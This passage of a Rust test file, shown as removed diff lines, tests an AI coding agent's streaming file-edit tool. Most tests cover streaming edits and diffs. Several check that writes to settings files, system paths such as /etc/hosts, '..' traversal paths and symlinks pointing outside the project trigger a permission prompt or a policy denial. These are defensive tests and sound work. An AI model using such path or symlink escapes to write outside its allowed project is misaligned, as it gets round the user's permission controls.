&PathBuf::from("root/.zed/tasks.json"), - "test 4", - &stream_tx, - cx, - ) - }); - let event = stream_rx.expect_authorization().await; - assert_eq!( - event.tool_call.fields.title, - Some("test 4 (local settings)".into()) - ); - - // Test 5: When global default is allow, sensitive and outside-project - // paths still require confirmation - cx.update(|cx| { - let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); - settings.tool_permissions.default = settings::ToolPermissionMode::Allow; - agent_settings::AgentSettings::override_global(settings, cx); - }); - - // 5.1: .zed/settings.json is a sensitive path — still prompts - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx.update(|cx| { - tool.authorize( - &PathBuf::from(".zed/settings.json"), - "test 5.1", - &stream_tx, - cx, - ) - }); - let event = stream_rx.expect_authorization().await; - assert_eq!( - event.tool_call.fields.title, - Some("test 5.1 (local settings)".into()) - ); - - // 5.2: /etc/hosts is outside the project, but Allow auto-approves - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - cx.update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), "test 5.2", &stream_tx, cx)) - .await - .unwrap(); - assert!(stream_rx.try_recv().is_err()); - - // 5.3: Normal in-project path with allow — no confirmation needed - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - cx.update(|cx| { - tool.authorize( - &PathBuf::from("root/src/main.rs"), - "test 5.3", - &stream_tx, - cx, - ) - }) - .await - .unwrap(); - assert!(stream_rx.try_recv().is_err()); - - // 5.4: With Confirm default, non-project paths still prompt - cx.update(|cx| { - let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); - settings.tool_permissions.default = settings::ToolPermissionMode::Confirm; - agent_settings::AgentSettings::override_global(settings, cx); - }); - - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx - .update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), "test 5.4", &stream_tx, cx)); - - let event = stream_rx.expect_authorization().await; - assert_eq!(event.tool_call.fields.title, Some("test 5.4".into())); - } - - #[gpui::test] - async fn test_streaming_authorize_create_under_symlink_with_allow(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", json!({})).await; - fs.insert_tree("/outside", json!({})).await; - fs.insert_symlink("/root/link", PathBuf::from("/outside")) - .await; - let (tool, _project, _action_log, _fs, _thread) = - setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; - - cx.update(|cx| { - let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); - settings.tool_permissions.default = settings::ToolPermissionMode::Allow; - agent_settings::AgentSettings::override_global(settings, cx); - }); - - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let authorize_task = cx.update(|cx| { - tool.authorize( - &PathBuf::from("link/new.txt"), - "create through symlink", - &stream_tx, - cx, - ) - }); - - let event = stream_rx.expect_authorization().await; - assert!( - event - .tool_call - .fields - .title - .as_deref() - .is_some_and(|title| title.contains("points outside the project")), - "Expected symlink escape authorization for create under external symlink" - ); - - event - .response - .send(acp_thread::SelectedPermissionOutcome::new( - acp::PermissionOptionId::new("allow"), - acp::PermissionOptionKind::AllowOnce, - )) - .unwrap(); - authorize_task.await.unwrap(); - } - - #[gpui::test] - async fn test_streaming_edit_file_symlink_escape_requests_authorization( - cx: &mut TestAppContext, - ) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - path!("/root"), - json!({ - "src": { "main.rs": "fn main() {}" } - }), - ) - .await; - fs.insert_tree( - path!("/outside"), - json!({ - "config.txt": "old content" - }), - ) - .await; - fs.create_symlink( - path!("/root/link_to_external").as_ref(), - PathBuf::from("/outside"), - ) - .await - .unwrap(); - let (tool, _project, _action_log, _fs, _thread) = - setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; - - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _authorize_task = cx.update(|cx| { - tool.authorize( - &PathBuf::from("link_to_external/config.txt"), - "edit through symlink", - &stream_tx, - cx, - ) - }); - - let auth = stream_rx.expect_authorization().await; - let title = auth.tool_call.fields.title.as_deref().unwrap_or(""); - assert!( - title.contains("points outside the project"), - "title should mention symlink escape, got: {title}" - ); - } - - #[gpui::test] - async fn test_streaming_edit_file_symlink_escape_denied(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - path!("/root"), - json!({ - "src": { "main.rs": "fn main() {}" } - }), - ) - .await; - fs.insert_tree( - path!("/outside"), - json!({ - "config.txt": "old content" - }), - ) - .await; - fs.create_symlink( - path!("/root/link_to_external").as_ref(), - PathBuf::from("/outside"), - ) - .await - .unwrap(); - let (tool, _project, _action_log, _fs, _thread) = - setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; - - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let authorize_task = cx.update(|cx| { - tool.authorize( - &PathBuf::from("link_to_external/config.txt"), - "edit through symlink", - &stream_tx, - cx, - ) - }); - - let auth = stream_rx.expect_authorization().await; - drop(auth); // deny by dropping - - let result = authorize_task.await; - assert!(result.is_err(), "should fail when denied"); - } - - #[gpui::test] - async fn test_streaming_edit_file_symlink_escape_honors_deny_policy(cx: &mut TestAppContext) { - init_test(cx); - cx.update(|cx| { - let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); - settings.tool_permissions.tools.insert( - "edit_file".into(), - agent_settings::ToolRules { - default: Some(settings::ToolPermissionMode::Deny), - ..Default::default() - }, - ); - agent_settings::AgentSettings::override_global(settings, cx); - }); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - path!("/root"), - json!({ - "src": { "main.rs": "fn main() {}" } - }), - ) - .await; - fs.insert_tree( - path!("/outside"), - json!({ - "config.txt": "old content" - }), - ) - .await; - fs.create_symlink( - path!("/root/link_to_external").as_ref(), - PathBuf::from("/outside"), - ) - .await - .unwrap(); - let (tool, _project, _action_log, _fs, _thread) = - setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; - - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let result = cx - .update(|cx| { - tool.authorize( - &PathBuf::from("link_to_external/config.txt"), - "edit through symlink", - &stream_tx, - cx, - ) - }) - .await; - - assert!(result.is_err(), "Tool should fail when policy denies"); - assert!( - !matches!( - stream_rx.try_recv(), - Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) - ), - "Deny policy should not emit symlink authorization prompt", - ); - } - - #[gpui::test] - async fn test_streaming_authorize_global_config(cx: &mut TestAppContext) { - init_test(cx); - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/project", json!({})).await; - let (tool, _project, _action_log, _fs, _thread) = - setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; - - let test_cases = vec![ - ( - "/etc/hosts", - true, - "System file should require confirmation", - ), - ( - "/usr/local/bin/script", - true, - "System bin file should require confirmation", - ), - ( - "project/normal_file.rs", - false, - "Normal project file should not require confirmation", - ), - ]; - - for (path, should_confirm, description) in test_cases { - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let auth = - cx.update(|cx| tool.authorize(&PathBuf::from(path), "Edit file", &stream_tx, cx)); - - if should_confirm { - stream_rx.expect_authorization().await; - } else { - auth.await.unwrap(); - assert!( - stream_rx.try_recv().is_err(), - "Failed for case: {} - path: {} - expected no confirmation but got one", - description, - path - ); - } - } - } - - #[gpui::test] - async fn test_streaming_needs_confirmation_with_multiple_worktrees(cx: &mut TestAppContext) { - init_test(cx); - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/workspace/frontend", - json!({ - "src": { - "main.js": "console.log('frontend');" - } - }), - ) - .await; - fs.insert_tree( - "/workspace/backend", - json!({ - "src": { - "main.rs": "fn main() {}" - } - }), - ) - .await; - fs.insert_tree( - "/workspace/shared", - json!({ - ".zed": { - "settings.json": "{}" - } - }), - ) - .await; - let (tool, _project, _action_log, _fs, _thread) = setup_test_with_fs( - cx, - fs, - &[ - path!("/workspace/frontend").as_ref(), - path!("/workspace/backend").as_ref(), - path!("/workspace/shared").as_ref(), - ], - ) - .await; - - let test_cases = vec![ - ("frontend/src/main.js", false, "File in first worktree"), - ("backend/src/main.rs", false, "File in second worktree"), - ( - "shared/.zed/settings.json", - true, - ".zed file in third worktree", - ), - ("/etc/hosts", true, "Absolute path outside all worktrees"), - ( - "../outside/file.txt", - true, - "Relative path outside worktrees", - ), - ]; - - for (path, should_confirm, description) in test_cases { - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let auth = - cx.update(|cx| tool.authorize(&PathBuf::from(path), "Edit file", &stream_tx, cx)); - - if should_confirm { - stream_rx.expect_authorization().await; - } else { - auth.await.unwrap(); - assert!( - stream_rx.try_recv().is_err(), - "Failed for case: {} - path: {} - expected no confirmation but got one", - description, - path - ); - } - } - } - - #[gpui::test] - async fn test_streaming_needs_confirmation_edge_cases(cx: &mut TestAppContext) { - init_test(cx); - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/project", - json!({ - ".zed": { - "settings.json": "{}" - }, - "src": { - ".zed": { - "local.json": "{}" - } - } - }), - ) - .await; - let (tool, _project, _action_log, _fs, _thread) = - setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; - - let test_cases = vec![ - ("", false, "Empty path is treated as project root"), - ("/", true, "Root directory should be outside project"), - ( - "project/../other", - true, - "Path with .. that goes outside of root directory", - ), - ( - "project/./src/file.rs", - false, - "Path with . should work normally", - ), - #[cfg(target_os = "windows")] - ("C:\\Windows\\System32\\hosts", true, "Windows system path"), - #[cfg(target_os = "windows")] - ("project\\src\\main.rs", false, "Windows-style project path"), - ]; - - for (path, should_confirm, description) in test_cases { - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let auth = - cx.update(|cx| tool.authorize(&PathBuf::from(path), "Edit file", &stream_tx, cx)); - - cx.run_until_parked(); - - if should_confirm { - stream_rx.expect_authorization().await; - } else { - assert!( - stream_rx.try_recv().is_err(), - "Failed for case: {} - path: {} - expected no confirmation but got one", - description, - path - ); - auth.await.unwrap(); - } - } - } - - #[gpui::test] - async fn test_streaming_needs_confirmation_with_different_modes(cx: &mut TestAppContext) { - init_test(cx); - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/project", - json!({ - "existing.txt": "content", - ".zed": { - "settings.json": "{}" - } - }), - ) - .await; - let (tool, _project, _action_log, _fs, _thread) = - setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; - - let modes = vec![StreamingEditFileMode::Edit, StreamingEditFileMode::Write]; - - for _mode in modes { - // Test .zed path with different modes - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx.update(|cx| { - tool.authorize( - &PathBuf::from("project/.zed/settings.json"), - "Edit settings", - &stream_tx, - cx, - ) - }); - - stream_rx.expect_authorization().await; - - // Test outside path with different modes - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx.update(|cx| { - tool.authorize( - &PathBuf::from("/outside/file.txt"), - "Edit file", - &stream_tx, - cx, - ) - }); - - stream_rx.expect_authorization().await; - - // Test normal path with different modes - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - cx.update(|cx| { - tool.authorize( - &PathBuf::from("project/normal.txt"), - "Edit file", - &stream_tx, - cx, - ) - }) - .await - .unwrap(); - assert!(stream_rx.try_recv().is_err()); - } - } - - #[gpui::test] - async fn test_streaming_initial_title_with_partial_input(cx: &mut TestAppContext) { - init_test(cx); - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/project", json!({})).await; - let (tool, _project, _action_log, _fs, _thread) = - setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; - - cx.update(|cx| { - assert_eq!( - tool.initial_title( - Err(json!({ - "path": "src/main.rs", - "display_description": "", - })), - cx - ), - "src/main.rs" - ); - assert_eq!( - tool.initial_title( - Err(json!({ - "path": "", - "display_description": "Fix error handling", - })), - cx - ), - "Fix error handling" - ); - assert_eq!( - tool.initial_title( - Err(json!({ - "path": "src/main.rs", - "display_description": "Fix error handling", - })), - cx - ), - "src/main.rs" - ); - assert_eq!( - tool.initial_title( - Err(json!({ - "path": "", - "display_description": "", - })), - cx - ), - DEFAULT_UI_TEXT - ); - assert_eq!( - tool.initial_title(Err(serde_json::Value::Null), cx), - DEFAULT_UI_TEXT - ); - }); - } - - #[gpui::test] - async fn test_streaming_diff_finalization(cx: &mut TestAppContext) { - init_test(cx); - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/", json!({"main.rs": ""})).await; - let (tool, project, action_log, _fs, thread) = - setup_test_with_fs(cx, fs, &[path!("/").as_ref()]).await; - let language_registry = project.read_with(cx, |p, _cx| p.languages().clone()); - - // Ensure the diff is finalized after the edit completes. - { - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let edit = cx.update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Edit file".into(), - path: path!("/main.rs").into(), - mode: StreamingEditFileMode::Write, - content: Some("new content".into()), - edits: None, - }), - stream_tx, - cx, - ) - }); - stream_rx.expect_update_fields().await; - let diff = stream_rx.expect_diff().await; - diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Pending(_)))); - cx.run_until_parked(); - edit.await.unwrap(); - diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Finalized(_)))); - } - - // Ensure the diff is finalized if the tool call gets dropped. - { - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - action_log, - language_registry, - )); - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let edit = cx.update(|cx| { - tool.run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Edit file".into(), - path: path!("/main.rs").into(), - mode: StreamingEditFileMode::Write, - content: Some("dropped content".into()), - edits: None, - }), - stream_tx, - cx, - ) - }); - stream_rx.expect_update_fields().await; - let diff = stream_rx.expect_diff().await; - diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Pending(_)))); - drop(edit); - cx.run_until_parked(); - diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Finalized(_)))); - } - } - - #[gpui::test] - async fn test_streaming_consecutive_edits_work(cx: &mut TestAppContext) { - let (tool, project, action_log, _fs, _thread) = - setup_test(cx, json!({"test.txt": "original content"})).await; - let read_tool = Arc::new(crate::ReadFileTool::new( - project.clone(), - action_log.clone(), - true, - )); - - // Read the file first - cx.update(|cx| { - read_tool.clone().run( - ToolInput::resolved(crate::ReadFileToolInput { - path: "root/test.txt".to_string(), - start_line: None, - end_line: None, - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await - .unwrap(); - - // First edit should work - let edit_result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "First edit".into(), - path: "root/test.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![Edit { - old_text: "original content".into(), - new_text: "modified content".into(), - }]), - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - assert!( - edit_result.is_ok(), - "First edit should succeed, got error: {:?}", - edit_result.as_ref().err() - ); - - // Second edit should also work because the edit updated the recorded read time - let edit_result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Second edit".into(), - path: "root/test.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![Edit { - old_text: "modified content".into(), - new_text: "further modified content".into(), - }]), - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - assert!( - edit_result.is_ok(), - "Second consecutive edit should succeed, got error: {:?}", - edit_result.as_ref().err() - ); - } - - #[gpui::test] - async fn test_streaming_external_modification_matching_edit_succeeds(cx: &mut TestAppContext) { - let (tool, project, action_log, fs, _thread) = - setup_test(cx, json!({"test.txt": "original content"})).await; - let read_tool = Arc::new(crate::ReadFileTool::new( - project.clone(), - action_log.clone(), - true, - )); - - // Read the file first - cx.update(|cx| { - read_tool.clone().run( - ToolInput::resolved(crate::ReadFileToolInput { - path: "root/test.txt".to_string(), - start_line: None, - end_line: None, - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await - .unwrap(); - - // Simulate external modification - cx.background_executor - .advance_clock(std::time::Duration::from_secs(2)); - fs.save( - path!("/root/test.txt").as_ref(), - &"externally modified content".into(), - language::LineEnding::Unix, - ) - .await - .unwrap(); - - // Reload the buffer to pick up the new mtime - let project_path = project - .read_with(cx, |project, cx| { - project.find_project_path("root/test.txt", cx) - }) - .expect("Should find project path"); - let buffer = project - .update(cx, |project, cx| project.open_buffer(project_path, cx)) - .await - .unwrap(); - buffer - .update(cx, |buffer, cx| buffer.reload(cx)) - .await - .unwrap(); - - cx.executor().run_until_parked(); - - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Edit after external change".into(), - path: "root/test.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![Edit { - old_text: "externally modified content".into(), - new_text: "new content".into(), - }]), - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await - .unwrap(); - - let StreamingEditFileToolOutput::Success { - new_text, - input_path, - .. - } = result - else { - panic!("expected success"); - }; - - assert_eq!(new_text, "new content"); - assert_eq!(input_path, PathBuf::from("root/test.txt")); - } - - #[gpui::test] - async fn test_streaming_external_modification_mentioned_when_match_fails( - cx: &mut TestAppContext, - ) { - let (tool, project, action_log, fs, _thread) = - setup_test(cx, json!({"test.txt": "original content"})).await; - let read_tool = Arc::new(crate::ReadFileTool::new( - project.clone(), - action_log.clone(), - true, - )); - - cx.update(|cx| { - read_tool.clone().run( - ToolInput::resolved(crate::ReadFileToolInput { - path: "root/test.txt".to_string(), - start_line: None, - end_line: None, - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await - .unwrap(); - - cx.background_executor - .advance_clock(std::time::Duration::from_secs(2)); - fs.save( - path!("/root/test.txt").as_ref(), - &"externally modified content".into(), - language::LineEnding::Unix, - ) - .await - .unwrap(); - - let project_path = project - .read_with(cx, |project, cx| { - project.find_project_path("root/test.txt", cx) - }) - .expect("Should find project path"); - let buffer = project - .update(cx, |project, cx| project.open_buffer(project_path, cx)) - .await - .unwrap(); - buffer - .update(cx, |buffer, cx| buffer.reload(cx)) - .await - .unwrap(); - - cx.executor().run_until_parked(); - - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Edit after external change".into(), - path: "root/test.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![Edit { - old_text: "original content".into(), - new_text: "new content".into(), - }]), - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - - let StreamingEditFileToolOutput::Error { - error, - diff, - input_path, - } = result.unwrap_err() - else { - panic!("expected error"); - }; - - assert!( - error.contains("Could not find matching text for edit at index 0"), - "Error should mention failed match, got: {error}" - ); - assert!( - error.contains("has changed on disk since you last read it"), - "Error should mention possible disk change, got: {error}" - ); - assert!(diff.is_empty()); - assert_eq!(input_path, Some(PathBuf::from("root/test.txt"))); - } - - #[gpui::test] - async fn test_streaming_dirty_buffer_detected(cx: &mut TestAppContext) { - let (tool, project, action_log, _fs, _thread) = - setup_test(cx, json!({"test.txt": "original content"})).await; - let read_tool = Arc::new(crate::ReadFileTool::new( - project.clone(), - action_log.clone(), - true, - )); - - // Read the file first - cx.update(|cx| { - read_tool.clone().run( - ToolInput::resolved(crate::ReadFileToolInput { - path: "root/test.txt".to_string(), - start_line: None, - end_line: None, - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await - .unwrap(); - - // Open the buffer and make it dirty - let project_path = project - .read_with(cx, |project, cx| { - project.find_project_path("root/test.txt", cx) - }) - .expect("Should find project path"); - let buffer = project - .update(cx, |project, cx| project.open_buffer(project_path, cx)) - .await - .unwrap(); - - buffer.update(cx, |buffer, cx| { - let end_point = buffer.max_point(); - buffer.edit([(end_point..end_point, " added text")], None, cx); - }); - - let is_dirty = buffer.read_with(cx, |buffer, _| buffer.is_dirty()); - assert!(is_dirty, "Buffer should be dirty after in-memory edit"); - - // Try to edit - should fail because buffer has unsaved changes - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Edit with dirty buffer".into(), - path: "root/test.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![Edit { - old_text: "original content".into(), - new_text: "new content".into(), - }]), - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - - let StreamingEditFileToolOutput::Error { - error, - diff, - input_path, - } = result.unwrap_err() - else { - panic!("expected error"); - }; - assert!( - error.contains("This file has unsaved changes."), - "Error should mention unsaved changes, got: {}", - error - ); - assert!( - error.contains("keep or discard"), - "Error should ask whether to keep or discard changes, got: {}", - error - ); - assert!( - error.contains("save or revert the file manually"), - "Error should ask user to manually save or revert when tools aren't available, got: {}", - error - ); - assert!(diff.is_empty()); - assert!(input_path.is_none()); - } - - #[gpui::test] - async fn test_streaming_overlapping_edits_resolved_sequentially(cx: &mut TestAppContext) { - // Edit 1's replacement introduces text that contains edit 2's - // old_text as a substring. Because edits resolve sequentially - // against the current buffer, edit 2 finds a unique match in - // the modified buffer and succeeds. - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "aaa\nbbb\nccc\nddd\neee\n"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Setup: resolve the buffer - sender.send_partial(json!({ - "display_description": "Overlapping edits", - "path": "root/file.txt", - "mode": "edit" - })); - cx.run_until_parked(); - - // Edit 1 replaces "bbb\nccc" with "XXX\nccc\nddd", so the - // buffer becomes "aaa\nXXX\nccc\nddd\nddd\neee\n". - // Edit 2's old_text "ccc\nddd" matches the first occurrence - // in the modified buffer and replaces it with "ZZZ". - // Edit 3 exists only to mark edit 2 as "complete" during streaming. - sender.send_partial(json!({ - "display_description": "Overlapping edits", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "bbb\nccc", "new_text": "XXX\nccc\nddd"}, - {"old_text": "ccc\nddd", "new_text": "ZZZ"}, - {"old_text": "eee", "new_text": "DUMMY"} - ] - })); - cx.run_until_parked(); - - // Send the final input with all three edits. - sender.send_full(json!({ - "display_description": "Overlapping edits", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "bbb\nccc", "new_text": "XXX\nccc\nddd"}, - {"old_text": "ccc\nddd", "new_text": "ZZZ"}, - {"old_text": "eee", "new_text": "DUMMY"} - ] - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "aaa\nXXX\nZZZ\nddd\nDUMMY\n"); - } - - #[gpui::test] - async fn test_streaming_create_content_streamed(cx: &mut TestAppContext) { - let (tool, project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Transition to BufferResolved - sender.send_partial(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "write" - })); - cx.run_until_parked(); - - // Stream content incrementally - sender.send_partial(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "write", - "content": "line 1\n" - })); - cx.run_until_parked(); - - // Verify buffer has partial content - let buffer = project.update(cx, |project, cx| { - let path = project - .find_project_path("root/dir/new_file.txt", cx) - .unwrap(); - project.get_open_buffer(&path, cx).unwrap() - }); - assert_eq!(buffer.read_with(cx, |b, _| b.text()), "line 1\n"); - - // Stream more content - sender.send_partial(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "write", - "content": "line 1\nline 2\n" - })); - cx.run_until_parked(); - assert_eq!(buffer.read_with(cx, |b, _| b.text()), "line 1\nline 2\n"); - - // Stream final chunk - sender.send_partial(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "write", - "content": "line 1\nline 2\nline 3\n" - })); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |b, _| b.text()), - "line 1\nline 2\nline 3\n" - ); - - // Send final input - sender.send_full(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "write", - "content": "line 1\nline 2\nline 3\n" - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "line 1\nline 2\nline 3\n"); - } - - #[gpui::test] - async fn test_streaming_overwrite_diff_revealed_during_streaming(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = setup_test( - cx, - json!({"file.txt": "old line 1\nold line 2\nold line 3\n"}), - ) - .await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, mut receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Transition to BufferResolved - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "write" - })); - cx.run_until_parked(); - - // Get the diff entity from the event stream - receiver.expect_update_fields().await; - let diff = receiver.expect_diff().await; - - // Diff starts pending with no revealed ranges - diff.read_with(cx, |diff, cx| { - assert!(matches!(diff, Diff::Pending(_))); - assert!(!diff.has_revealed_range(cx)); - }); - - // Stream first content chunk - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "write", - "content": "new line 1\n" - })); - cx.run_until_parked(); - - // Diff should now have revealed ranges showing the new content - diff.read_with(cx, |diff, cx| { - assert!(diff.has_revealed_range(cx)); - }); - - // Send final input - sender.send_full(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "write", - "content": "new line 1\nnew line 2\n" - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { - new_text, old_text, .. - } = result.unwrap() - else { - panic!("expected success"); - }; - assert_eq!(new_text, "new line 1\nnew line 2\n"); - assert_eq!(*old_text, "old line 1\nold line 2\nold line 3\n"); - - // Diff is finalized after completion - diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Finalized(_)))); - } - - #[gpui::test] - async fn test_streaming_overwrite_content_streamed(cx: &mut TestAppContext) { - let (tool, project, _action_log, _fs, _thread) = setup_test( - cx, - json!({"file.txt": "old line 1\nold line 2\nold line 3\n"}), - ) - .await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Transition to BufferResolved - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "write" - })); - cx.run_until_parked(); - - // Verify buffer still has old content (no content partial yet) - let buffer = project.update(cx, |project, cx| { - let path = project.find_project_path("root/file.txt", cx).unwrap(); - project.open_buffer(path, cx) - }); - let buffer = buffer.await.unwrap(); - assert_eq!( - buffer.read_with(cx, |b, _| b.text()), - "old line 1\nold line 2\nold line 3\n" - ); - - // First content partial replaces old content - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "write", - "content": "new line 1\n" - })); - cx.run_until_parked(); - assert_eq!(buffer.read_with(cx, |b, _| b.text()), "new line 1\n"); - - // Subsequent content partials append - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "write", - "content": "new line 1\nnew line 2\n" - })); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |b, _| b.text()), - "new line 1\nnew line 2\n" - ); - - // Send final input with complete content - sender.send_full(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "write", - "content": "new line 1\nnew line 2\nnew line 3\n" - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { - new_text, old_text, .. - } = result.unwrap() - else { - panic!("expected success"); - }; - assert_eq!(new_text, "new line 1\nnew line 2\nnew line 3\n"); - assert_eq!(*old_text, "old line 1\nold line 2\nold line 3\n"); - } - - #[gpui::test] - async fn test_streaming_edit_json_fixer_escape_corruption(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "hello\nworld\nfoo\n"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - sender.send_partial(json!({ - "display_description": "Edit", - "path": "root/file.txt", - "mode": "edit" - })); - cx.run_until_parked(); - - // Simulate JSON fixer producing a literal backslash when the LLM - // stream cuts in the middle of a \n escape sequence. - // The old_text "hello\nworld" would be streamed as: - // partial 1: old_text = "hello\\" (fixer closes incomplete \n as \\) - // partial 2: old_text = "hello\nworld" (fixer corrected the escape) - sender.send_partial(json!({ - "display_description": "Edit", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "hello\\"}] - })); - cx.run_until_parked(); - - // Now the fixer corrects it to the real newline. - sender.send_partial(json!({ - "display_description": "Edit", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "hello\nworld"}] - })); - cx.run_until_parked(); - - // Send final. - sender.send_full(json!({ - "display_description": "Edit", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "hello\nworld", "new_text": "HELLO\nWORLD"}] - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "HELLO\nWORLD\nfoo\n"); - } - - #[gpui::test] - async fn test_streaming_final_input_stringified_edits_succeeds(cx: &mut 